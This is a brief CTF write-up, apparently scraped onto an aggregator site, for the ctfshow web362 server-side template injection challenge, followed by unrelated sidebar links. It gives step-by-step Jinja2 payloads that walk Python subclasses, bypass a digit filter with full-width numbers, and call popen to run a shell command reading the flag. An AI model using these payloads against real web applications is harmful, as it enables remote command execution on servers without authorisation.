当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
?name={
{"".__class__.__bases__[0].__subclasses__()}} It's normal up to this point 
from 12 It didn't work at first 
There's a problem with the numbers , see wp Use full angle numbers instead of normal numbers to bypass
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
Then you should be able to do it in the normal way
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- 串口调试工具cutecom和minicom
- SSD硬盘SATA接口和M.2接口区别(详细)总结
- Daily network security certification test questions (April 14, 2022)
- The difference between deep copy and shallow copy
- C medium? This form of
- Stm32mp157 wm8960 audio driver debugging notes
- Closure type of rust (difference between FN, fnmut and fnone)
- Interpretation and compilation of JVM
- Introduction to quantexa CDI syneo platform
- MATLAB从入门到精通(二)
猜你喜欢
Spark performance optimization guide
Kettle paoding jieniu Chapter 17 text file output
Promote QT default control to custom control
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
STM32: LCD显示
多功能工具箱微信小程序源码
Matlab tips (6) comparison of seven filtering methods
Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash
QT add external font ttf
Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
随机推荐
With the use of qchart, the final UI interface can be realized. The control of qweight can be added and promoted to a user-defined class. Only the class needs to be promoted to realize the coordinate
The vivado project corresponding to the board is generated by TCL script
WIN1 remote "this may be due to credssp encryption Oracle correction" solution
【ACM】455. Distribute Biscuits (1. Give priority to big biscuits to big appetite; 2. Traverse two arrays with only one for loop (use subscript index -- to traverse another array))
Log4j2 cross thread print traceid
How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
PowerDesigner various font settings; Preview font setting; SQL font settings
Creation and use of QT dynamic link library
软件测试总结
Robocode Tutorial 4 - robocode's game physics
Robocode tutorial 3 - Robo machine analysis
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
If condition judgment in shell language
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
Error reported when running tensorboard: valueerror: duplicate plugins for name projector, solution
Imx6 debugging LVDS screen technical notes
【ACM】376. 摆动序列
Nodejs installation
Install the yapiupload plug-in in idea and upload the API interface to the Yapi document
Test post and login function